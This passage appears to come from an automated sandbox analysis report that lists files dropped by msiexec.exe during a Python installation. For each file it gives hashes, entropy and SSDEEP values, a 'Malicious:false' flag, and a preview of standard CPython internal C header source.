                                                                                                                                Preview:// Implementation of PEP 585: support list[int] etc...#ifndef Py_GENERICALIASOBJECT_H..#define Py_GENERICALIASOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(PyObject *) Py_GenericAlias(PyObject *, PyObject *);..PyAPI_DATA(PyTypeObject) Py_GenericAliasType;....#ifdef __cplusplus..}..#endif..#endif /* !Py_GENERICALIASOBJECT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3123
                                                                                                                                Entropy (8bit):5.160244677280601
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5s0HAnqznc1vH8tAYimSHomuKsnDHYL+Rk:jYQAH8WHunb7k
                                                                                                                                MD5:4DF30A7387DC9510C7E3DF5AF6DB45A1
                                                                                                                                SHA1:A4A3B658A706997C39242BEC84905C932A03D29A
                                                                                                                                SHA-256:2C825EBF07D985EC8BD3D293EC19DF3E54E56BB1AC02075D453D320815C7E7B9
                                                                                                                                SHA-512:79EB1C88AC58F58D43EA4C9E691AF73F6C1C8AD30F7EB13AF1DB83823103981FD96D0217BBFDE9FB9BD4051BD08E9D84267BF45AD1E94E94A7C0748377A66421
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Module definition and import interface */....#ifndef Py_IMPORT_H..#define Py_IMPORT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_FUNC(long) PyImport_GetMagicNumber(void);..PyAPI_FUNC(const char *) PyImport_GetMagicTag(void);..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModule(.. const char *name, /* UTF-8 encoded string */.. PyObject *co.. );..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModuleEx(.. const char *name, /* UTF-8 encoded string */.. PyObject *co,.. const char *pathname /* decoded from the filesystem encoding */.. );..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModuleWithPathnames(.. const char *name, /* UTF-8 encoded string */.. PyObject *co,.. const char *pathname, /* decoded from the filesystem encoding */.. const char *cpathname /* decoded from the filesystem encoding */.. );..#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000..PyAPI_FUNC(PyObject *) PyImport_ExecCodeModuleObj
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):636
                                                                                                                                Entropy (8bit):5.361409062040798
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B65HL5R4r3Z/HQUZaQGILK51KHEEWM7zctcyClGv6p7QXETxWp7QXETn8:ghLQxwUZaGLKrzOctPClFpypRn8
                                                                                                                                MD5:937A46B9B22DD30FE421F80C6EEFB7E1
                                                                                                                                SHA1:A12AB55C2ED65F39092BDC3E470CEEE05583C2E3
                                                                                                                                SHA-256:6543DF7069F341CF7E02E74848BA5D8DDCBEC7417FF246C774DC53CC2EF6EC09
                                                                                                                                SHA-512:6234838C7E93B6E2945454EB3D0A2CFD3B7C5A4299CE16DA6D234511D4BB44DD7876AB855105CF6FDA18E015A26E83F00B508788CD4B96EBF8179BF14E740631
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_ABSTRACT_H..#define Py_INTERNAL_ABSTRACT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....// Fast inlined version of PyIndex_Check()..static inline int.._PyIndex_Check(PyObject *obj)..{.. PyNumberMethods *tp_as_number = Py_TYPE(obj)->tp_as_number;.. return (tp_as_number != NULL && tp_as_number->nb_index != NULL);..}....PyObject *_PyNumber_PowerNoMod(PyObject *lhs, PyObject *rhs);..PyObject *_PyNumber_InPlacePowerNoMod(PyObject *lhs, PyObject *rhs);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_ABSTRACT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1165
                                                                                                                                Entropy (8bit):5.15545639057656
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:oi/fL/ZvF8SjbBxwUZaG4evheGgvNWmWLAvutx1D7Fr/C/cQ12dTz8xm/r6sQ1n6:3rEe9xbaFewLl80mr1DBwKTgxm/r6sQY
                                                                                                                                MD5:D5B6134238CDA84A0A4B858CC48D68D1
                                                                                                                                SHA1:E22A01BA9F9E47F623F4184D119BE4198D9C26C5
                                                                                                                                SHA-256:61AED846511A9D87A1156908FAE5E23A2FBC21D14522E032967CB708B7985CBA
                                                                                                                                SHA-512:43F6F6102D73DB5F24071A01915E5CC35257A690B0B83314227ED59F427C7DDB2A7D44C332D0157DD9B7C3CA8441D1F10E9C648306E190F1E8F38799392859B4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef Py_INTERNAL_ACCU_H..#define Py_INTERNAL_ACCU_H..#ifdef __cplusplus..extern "C" {..#endif..../*** This is a private API for use by the interpreter and the stdlib... *** Its definition may be changed or removed at any moment... ***/....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../*.. * A two-level accumulator of unicode objects that avoids both the overhead.. * of keeping a huge number of small separate objects, and the quadratic.. * behaviour of using a naive repeated concatenation scheme... */....#undef small /* defined by some Windows headers */....typedef struct {.. PyObject *large; /* A list of previously accumulated large strings */.. PyObject *small; /* Pending small strings */..} _PyAccu;....PyAPI_FUNC(int) _PyAccu_Init(_PyAccu *acc);..PyAPI_FUNC(int) _PyAccu_Accumulate(_PyAccu *acc, PyObject *unicode);..PyAPI_FUNC(PyObject *) _PyAccu_FinishAsList(_PyAccu *acc);..PyAPI_FUNC(PyObject *) _PyAccu_Fini
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3143
                                                                                                                                Entropy (8bit):5.121127435203511
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Jx+ksczjKtKK6TYNCfl0twpSsqwsf/sdM+I7mqqbQ:JckskKtKK6TYel0D/su+I7mqqbQ
                                                                                                                                MD5:6A808A436A46AC9CB34053EC85FE3000
                                                                                                                                SHA1:C4D695CAFA3EEC4014674A6E8FE2935588C288C2
                                                                                                                                SHA-256:D609AA62D31FE9D329460FA990BB6E51D2BDD8115C23D34600D0E621DB3ED17D
                                                                                                                                SHA-512:7625799C36D5A25901CA2B231131C719D3FC164F34B2C0643258C66A2A98A701DB5E8231DE89630603AF17E7675AEEFDA068B2364DFA79B6E15CB0445692C07D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_ASDL_H..#define Py_INTERNAL_ASDL_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_pyarena.h" // _PyArena_Malloc()....typedef PyObject * identifier;..typedef PyObject * string;..typedef PyObject * object;..typedef PyObject * constant;..../* It would be nice if the code generated by asdl_c.py was completely.. independent of Python, but it is a goal the requires too much work.. at this stage. So, for example, I'll represent identifiers as.. interned Python strings...*/....#define _ASDL_SEQ_HEAD \.. Py_ssize_t size; \.. void **elements;....typedef struct {.. _ASDL_SEQ_HEAD..} asdl_seq;....typedef struct {.. _ASDL_SEQ_HEAD.. void *typed_elements[1];..} asdl_generic_seq;....typedef struct {.. _ASDL_SEQ_HEAD.. PyObject *typed_elements[1];..} asdl_identifier_seq;....typedef struct {.. _ASDL_SEQ_HEAD.. int typed_elements[1];..} asdl_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):30181
                                                                                                                                Entropy (8bit):4.337784822806142
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:F9rpUq9KCb9lFwsO4seneBNXq1xsxByKjTu7KXgf6bfLEKZJ311gJhISKhc186FJ:7pUq9ZBwsO4seWwxsjyKjTuOgf6bfLEL
                                                                                                                                MD5:1A2E38CDC11226A3C1C84830FBC0FCF9
                                                                                                                                SHA1:ABD07532F8A0013035E168B37D2F1D3D71D9E3F4
                                                                                                                                SHA-256:97C88F86A4056245EBB813A6D3D0CDA3FECB85CCD005883C1FF7B5FBD6F9796C
                                                                                                                                SHA-512:952151F494B3A781DE0DA7AB5AAF6243C9C99AD43B38EA831571B31749243F55C9557DA19F99806DD3230171B438B291139D033386BAE859869DC9E7C58334C7
                                                                                                                                Malicious:false
                                                                                                                                Preview:// File automatically generated by Parser/asdl_c.py.....#ifndef Py_INTERNAL_AST_H..#define Py_INTERNAL_AST_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_asdl.h"....typedef struct _mod *mod_ty;....typedef struct _stmt *stmt_ty;....typedef struct _expr *expr_ty;....typedef enum _expr_context { Load=1, Store=2, Del=3 } expr_context_ty;....typedef enum _boolop { And=1, Or=2 } boolop_ty;....typedef enum _operator { Add=1, Sub=2, Mult=3, MatMult=4, Div=5, Mod=6, Pow=7,.. LShift=8, RShift=9, BitOr=10, BitXor=11, BitAnd=12,.. FloorDiv=13 } operator_ty;....typedef enum _unaryop { Invert=1, Not=2, UAdd=3, USub=4 } unaryop_ty;....typedef enum _cmpop { Eq=1, NotEq=2, Lt=3, LtE=4, Gt=5, GtE=6, Is=7, IsNot=8,.. In=9, NotIn=10 } cmpop_ty;....typedef struct _comprehension *comprehension_ty;....typedef struct _excepthandler *except
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6793
                                                                                                                                Entropy (8bit):4.590358016554953
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:vcd6kWgpjrqL/z/qFbD3jJAuLNFV2zaB/clapts:/Upts
                                                                                                                                MD5:82F92ED4591C46FBE2E5D66AC9107226
                                                                                                                                SHA1:10A39F4DAC72F13314D71D3FA168513B7DC3C79A
                                                                                                                                SHA-256:962594086604DF985F6CF5A9C4E935EE27AE4D7D86D530F511EC07187FB790D6
                                                                                                                                SHA-512:FEDA1C71E5052FFC9D646A5F7F5EB967E35B9C689FF7DEC9A552020A2ABA2C295CB117F48E99F3CFA0B9D86C8845841AA39B478E07736C4E1D7245AF2DCE2577
                                                                                                                                Malicious:false
                                                                                                                                Preview:// File automatically generated by Parser/asdl_c.py.....#ifndef Py_INTERNAL_AST_STATE_H..#define Py_INTERNAL_AST_STATE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....struct ast_state {.. int initialized;.. int recursion_depth;.. int recursion_limit;.. PyObject *AST_type;.. PyObject *Add_singleton;.. PyObject *Add_type;.. PyObject *And_singleton;.. PyObject *And_type;.. PyObject *AnnAssign_type;.. PyObject *Assert_type;.. PyObject *Assign_type;.. PyObject *AsyncFor_type;.. PyObject *AsyncFunctionDef_type;.. PyObject *AsyncWith_type;.. PyObject *Attribute_type;.. PyObject *AugAssign_type;.. PyObject *Await_type;.. PyObject *BinOp_type;.. PyObject *BitAnd_singleton;.. PyObject *BitAnd_type;.. PyObject *BitOr_singleton;.. PyObject *BitOr_type;.. PyObject *BitXor_singleton;.. PyObject *BitXor_type;.. PyObject *BoolOp_type;.. PyO
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17536
                                                                                                                                Entropy (8bit):5.072704150767552
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:YeRnIoV5tPM8n5aKoiVRiRaKMI+3Imatm7BbE6W+kQKM6tlbvwj0bROKn5:/JvyiCChu6Sp5
                                                                                                                                MD5:A44C450C10E31E8BC2DD32B9F9277918
                                                                                                                                SHA1:877FC5C9D2E5434BCA35CBD50E92DC2E57F1B1AB
                                                                                                                                SHA-256:8F5BF76B7AACC3BDD0B305DE42947BCE33E20B32A31BD0E7F827756EF45AEA07
                                                                                                                                SHA-512:315948953BD8EB0B74CF5167515DDDB4C94CEB18F563611FD2C2B6D1065236FD587C31C66045438BEF563F97691867FA915194FBEE405BAE20D7AE240120C187
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_ATOMIC_H..#define Py_ATOMIC_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "dynamic_annotations.h" /* _Py_ANNOTATE_MEMORY_ORDER */..#include "pyconfig.h"....#ifdef HAVE_STD_ATOMIC..# include <stdatomic.h>..#endif......#if defined(_MSC_VER)..#include <intrin.h>..#if defined(_M_IX86) || defined(_M_X64)..# include <immintrin.h>..#endif..#endif..../* This is modeled after the atomics interface from C1x, according to.. * the draft at.. * http://www.open-std.org/JTC1/SC22/wg14/www/docs/n1425.pdf... * Operations and types are named the same except with a _Py_ prefix.. * and have the same semantics... *.. * Beware, the implementations here are deep magic... */....#if defined(HAVE_STD_ATOMIC)....typedef enum _Py_memory_order {.. _Py_memory_order_relaxed = memory_order_relaxed,.. _Py_memory_order_acquire = memory_order_acquire,.. _Py_memory_order_release = memory_order_release,
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2532
                                                                                                                                Entropy (8bit):5.096240366600643
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0fb3FdenpLxban0yLdd+RddKYqSj/hjSYhtMYKdh/sdi0l6:4b1QpLx+nPpYRddKfSjRSYjMphEi0l6
                                                                                                                                MD5:6CF03CFD0AA8D67D7B3DB29FF9D21A25
                                                                                                                                SHA1:E2D3DF71CDA964302B513433DD2B90CF276D06C3
                                                                                                                                SHA-256:9E01A0C8EA3E54B1D939C8752539DAC42F7C3628D8DE7D80837A714616095887
                                                                                                                                SHA-512:39AF5E8023C0CFA41851A83F366A99DBBED16E7EB7F49FEDDF4C8E4BDF0F78BF4633DBC6AA59ABABB38689CD428B67A76A8FBE96BC93D69548D871F7BA4C125E
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Atomic functions: similar to pycore_atomic.h, but don't need.. to declare variables as atomic..... Py_ssize_t type:.... * value = _Py_atomic_size_get(&var).. * _Py_atomic_size_set(&var, value).... Use sequentially-consistent ordering (__ATOMIC_SEQ_CST memory order):.. enforce total ordering with all other atomic functions...*/..#ifndef Py_ATOMIC_FUNC_H..#define Py_ATOMIC_FUNC_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#if defined(_MSC_VER)..# include <intrin.h> // _InterlockedExchange()..#endif......// Use builtin atomic operations in GCC >= 4.7 and clang..#ifdef HAVE_BUILTIN_ATOMIC....static inline Py_ssize_t _Py_atomic_size_get(Py_ssize_t *var)..{.. return __atomic_load_n(var, __ATOMIC_SEQ_CST);..}....static inline void _Py_atomic_size_set(Py_ssize_t *var, Py_ssize_t value)..{.. __atomic_store_n(var, value, __ATOMIC_SEQ_CST);..}....#elif defined(_MSC_VER)....st
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6248
                                                                                                                                Entropy (8bit):5.222207727131199
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:bcn8ZFGdRONkRNYHRYNiRJdkRpnRw+/8HU80RLrR5EWrSnQCU84/OIvL:+8ZFGjONWKxYNofWpRF0HU8mBXrklU8S
                                                                                                                                MD5:B3ECD795E52B67845E4ACADCD56B6119
                                                                                                                                SHA1:6160206A15FDAB5F831891939ECEDACA90C8FEAC
                                                                                                                                SHA-256:599354E65503E1FE76FD1D7EDF75BA1B0ACB2151CA12C541E5DE4DF207695D5E
                                                                                                                                SHA-512:9715922927499707F9141A8E8EEEEFF0CD0BE9A60E7A4743699FAEDA28F754987C36CA71DEBD9DB47E08950ADE998CDB870C3067E01C549EA360DB29834876D0
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Bit and bytes utilities..... Bytes swap functions, reverse order of bytes:.... - _Py_bswap16(uint16_t).. - _Py_bswap32(uint32_t).. - _Py_bswap64(uint64_t)..*/....#ifndef Py_INTERNAL_BITUTILS_H..#define Py_INTERNAL_BITUTILS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#if defined(__GNUC__) \.. && ((__GNUC__ >= 5) || (__GNUC__ == 4) && (__GNUC_MINOR__ >= 8)).. /* __builtin_bswap16() is available since GCC 4.8,.. __builtin_bswap32() is available since GCC 4.3,.. __builtin_bswap64() is available since GCC 4.3. */..# define _PY_HAVE_BUILTIN_BSWAP..#endif....#ifdef _MSC_VER.. /* Get _byteswap_ushort(), _byteswap_ulong(), _byteswap_uint64() */..# include <intrin.h>..#endif....static inline uint16_t.._Py_bswap16(uint16_t word)..{..#if defined(_PY_HAVE_BUILTIN_BSWAP) || _Py__has_builtin(__builtin_bswap16).. return __builtin_bswap16(word);..#elif defined(_MSC_VER).. Py_B
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9004
                                                                                                                                Entropy (8bit):5.061855730041505
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:aZQNGdG2GRmGRDLSrdmq833lI8ElURUtR3tmoV+l+RO+g/xGb:N7DLkTU3SORO3tBYl+RO+k+
                                                                                                                                MD5:C7F4F7B3C1325AC902929248DB77C968
                                                                                                                                SHA1:19C95173C6EB40608B788312734FE3655D1A2656
                                                                                                                                SHA-256:2D9640645019C4BD889530F95811CBB4E6D85CCA8DE21744406E117B0F82887C
                                                                                                                                SHA-512:1EC2253E11E9FA05A34474E64E2B789ED39162F1CBBF0E6B24E0C902A31F3B499A21CC5EF970ED0ADBF31088A64A89A7D29800EE651448A2B9D19622A9A3AFFC
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*.. _BlocksOutputBuffer is used to maintain an output buffer.. that has unpredictable size. Suitable for compression/decompression.. API (bz2/lzma/zlib) that has stream->next_out and stream->avail_out:.... stream->next_out: point to the next output position... stream->avail_out: the number of available bytes left in the buffer..... It maintains a list of bytes object, so there is no overhead of resizing.. the buffer..... Usage:.... 1, Initialize the struct instance like this:.. _BlocksOutputBuffer buffer = {.list = NULL};.. Set .list to NULL for _BlocksOutputBuffer_OnError().... 2, Initialize the buffer use one of these functions:.. _BlocksOutputBuffer_InitAndGrow().. _BlocksOutputBuffer_InitWithSize().... 3, If (avail_out == 0), grow the buffer:.. _BlocksOutputBuffer_Grow().... 4, Get the current outputted data size:.. _BlocksOutputBuffer_GetDataSize().... 5, Finish the buffer, and return a bytes object:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3457
                                                                                                                                Entropy (8bit):4.851970899710655
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:od1xwUZaG8rYXQFGM9n40O2D/ot/wk9CBC8ie/mIeW9BTJbhYhzbhfmhKiKIlh3c:axbanrYgTaak9Q64L9RJuWQXGs/0hcuo
                                                                                                                                MD5:AA3251198DB61E8412E78A6F4402C3DA
                                                                                                                                SHA1:6162CCE24F8E33784761145163652C61BA0AC356
                                                                                                                                SHA-256:7F0E14A0E97255A066600EF715824BB4446A7B0951B00D9562AEAD25DB49743A
                                                                                                                                SHA-512:34CD89C85E76EDF55089DFFD38D18E4F785C28B679A2C8CC245BBE18FC2A60CBE109EABB317211CC785D1301464773B17AA20007C93F8EB535672F7736719B68
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef Py_BYTES_CTYPE_H..#define Py_BYTES_CTYPE_H....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../*.. * The internal implementation behind PyBytes (bytes) and PyByteArray (bytearray).. * methods of the given names, they operate on ASCII byte strings... */..extern PyObject* _Py_bytes_isspace(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_isalpha(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_isalnum(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_isascii(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_isdigit(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_islower(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_isupper(const char *cptr, Py_ssize_t len);..extern PyObject* _Py_bytes_istitle(const char *cptr, Py_ssize_t len);..../* These store their len sized answer in the given preallocated *result arg. */..extern void _Py_bytes_lo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1476
                                                                                                                                Entropy (8bit):4.929112882618209
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gkOLkbxwUZaG1yCUlwtWGM1vUGW1u5y98DWDRKOylD+oG8nkr:gdwxbauKeKq4OCRGQc
                                                                                                                                MD5:21A7CC4E955C74521258DAFEFAF1C0E3
                                                                                                                                SHA1:8D74C3DF681BF4AA7576BED9753801B410D015DC
                                                                                                                                SHA-256:F6BF138843790EC52669380A2EB8EE05E0D0269591CF8F5887E28C16DE977939
                                                                                                                                SHA-512:CB9C65288E111AF162F3FF579B696232858DADA487D640F6460300882096B4FA746278AF87D2765251BD59359D5FD3435127EB9260E8B8142F1844C1C41FFC5B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_BYTESOBJECT_H..#define Py_INTERNAL_BYTESOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern PyStatus _PyBytes_InitTypes(PyInterpreterState *);....../* Substring Search..... Returns the index of the first occurrence of.. a substring ("needle") in a larger text ("haystack")... If the needle is not found, return -1... If the needle is found, add offset to the index...*/....PyAPI_FUNC(Py_ssize_t).._PyBytes_Find(const char *haystack, Py_ssize_t len_haystack,.. const char *needle, Py_ssize_t len_needle,.. Py_ssize_t offset);..../* Same as above, but search right-to-left */..PyAPI_FUNC(Py_ssize_t).._PyBytes_ReverseFind(const char *haystack, Py_ssize_t len_haystack,.. const char *needle, Py_ssize_t len_needle,.. Py_ssize_t offset);....../** Helper function to implement the repea
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3596
                                                                                                                                Entropy (8bit):5.045046458599877
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Jx+IWweq6MzrNhlle6qjeJtRlRrpqtIRtsaYmbRtsxqxRt1:JcIWweq6Y3BqaJflRtqtIRpYmbRWqxR3
                                                                                                                                MD5:3C89A510E3992FAB78C7BD873D1E6F93
                                                                                                                                SHA1:E9A78231AA42FF976CE8918772F8699F62819823
                                                                                                                                SHA-256:4296831142991DB1A5ADB39B0809FC6A8339C05895789C9F6049E4A7CAF07782
                                                                                                                                SHA-512:1C54E22C4FC075E8B7980225430ECDBC01E46A73F8B8A5BD1595EF9BC6F5645614F7A37529951DD582F559BD2EB31B835FEAFBFE903061BD78EFBCD96A3CDAD1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_CALL_H..#define Py_INTERNAL_CALL_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_pystate.h" // _PyThreadState_GET()....PyAPI_FUNC(PyObject *) _PyObject_Call_Prepend(.. PyThreadState *tstate,.. PyObject *callable,.. PyObject *obj,.. PyObject *args,.. PyObject *kwargs);....PyAPI_FUNC(PyObject *) _PyObject_FastCallDictTstate(.. PyThreadState *tstate,.. PyObject *callable,.. PyObject *const *args,.. size_t nargsf,.. PyObject *kwargs);....PyAPI_FUNC(PyObject *) _PyObject_Call(.. PyThreadState *tstate,.. PyObject *callable,.. PyObject *args,.. PyObject *kwargs);....extern PyObject * _PyObject_CallMethodFormat(.. PyThreadState *tstate, PyObject *callable, const char *format, ...);......// Static inline variant of public PyVectorcall_Function()...static inline vectorcallfunc.._PyVectorcall_FunctionInline(PyObject *call
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4547
                                                                                                                                Entropy (8bit):5.164469547491149
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:3E6x+I12wlD39wC2bxa9wdaPS8SrodncRdw3HzFNZzBE52VaUmbRpVmGyXa:3E6ctwlz9ExUwUPgrodncw3TFNRBE52U
                                                                                                                                MD5:F2BC9D265D4227A8319FC053D1FEE738
                                                                                                                                SHA1:437DB8AAC81D599785EA7FFBA09CF8AA13899FE0
                                                                                                                                SHA-256:AF985832C71BD54F6D311C11AC98DE1CFE27623B543C5B780A4C9564B1D8CDEC
                                                                                                                                SHA-512:7332F8A888BAC78CC3C807D10209879973664422EB5FFA7415D7DACC5D6E570A27BB452832882ED95325020CFFA27ACC204641EADF622894A7D0255B6915E694
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_CEVAL_H..#define Py_INTERNAL_CEVAL_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* Forward declarations */..struct pyruntimestate;..struct _ceval_runtime_state;..../* WASI has limited call stack. Python's recursion limit depends on code.. layout, optimization, and WASI runtime. Wasmtime can handle about 700-750.. recursions, sometimes less. 600 is a more conservative limit. */..#ifndef Py_DEFAULT_RECURSION_LIMIT..# ifdef __wasi__..# define Py_DEFAULT_RECURSION_LIMIT 600..# else..# define Py_DEFAULT_RECURSION_LIMIT 1000..# endif..#endif....#include "pycore_interp.h" // PyInterpreterState.eval_frame..#include "pycore_pystate.h" // _PyThreadState_GET()......extern void _Py_FinishPendingCalls(PyThreadState *tstate);..extern void _PyEval_InitRuntimeState(struct _ceval_runtime_state *);..extern void _PyEval_InitState(struct _ceval_state *, PyThread_type_lock)
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16494
                                                                                                                                Entropy (8bit):5.269350683095055
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:+Em6Cg1BIS+F+JGXCnWzig2lec+PC2z8Q4mhmudpfwPV:+Em6Cg1BIS+Eltec+PC2z8w7wN
                                                                                                                                MD5:77F76CF83E3A50D4F753CE06FC5732B8
                                                                                                                                SHA1:240F508FB30B242625C74319844C0566218E706A
                                                                                                                                SHA-256:A5FAAB5DCA3EA1A5F5E886D0F49062EFC4454B2030589EF056573FE4EADD0AB5
                                                                                                                                SHA-512:851E40B4C6B8BC0F5CD6AF7444D8A23E4A29B48A65827D56A6868B5C3B928050C66E55E94EA915D415D6CF2A400EC4DBCFC6FB1B390583D4A2D9B51419C4CF6C
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_CODE_H..#define Py_INTERNAL_CODE_H..#ifdef __cplusplus..extern "C" {..#endif..../* PEP 659.. * Specialization and quickening structs and helper functions.. */......// Inline caches. If you change the number of cache entries for an instruction,..// you must *also* update the number of cache entries in Lib/opcode.py and bump..// the magic number in Lib/importlib/_bootstrap_external.py!....#define CACHE_ENTRIES(cache) (sizeof(cache)/sizeof(_Py_CODEUNIT))....typedef struct {.. _Py_CODEUNIT counter;.. _Py_CODEUNIT index;.. _Py_CODEUNIT module_keys_version[2];.. _Py_CODEUNIT builtin_keys_version;..} _PyLoadGlobalCache;....#define INLINE_CACHE_ENTRIES_LOAD_GLOBAL CACHE_ENTRIES(_PyLoadGlobalCache)....typedef struct {.. _Py_CODEUNIT counter;..} _PyBinaryOpCache;....#define INLINE_CACHE_ENTRIES_BINARY_OP CACHE_ENTRIES(_PyBinaryOpCache)....typedef struct {.. _Py_CODEUNIT counter;..} _PyUnpackSequenceCache;....#define INLINE_CACHE_ENTRIES_UNPACK_SEQUENCE \..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1089
                                                                                                                                Entropy (8bit):4.9907200047742455
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gNmLNzxwUZaGIu/ooNsZiNyoxudn/JcpoCnZnNnD:gNuNzxbaRugQs0POmNNnD
                                                                                                                                MD5:7EA83A9F81032521CF6CF71F0134954A
                                                                                                                                SHA1:5DA10F479327FAE42F553ADEE61DA0896C907B60
                                                                                                                                SHA-256:98061115641CE88000C3CD2E07D67453DEE82E2B483E629ECD638FCDA73DC4BF
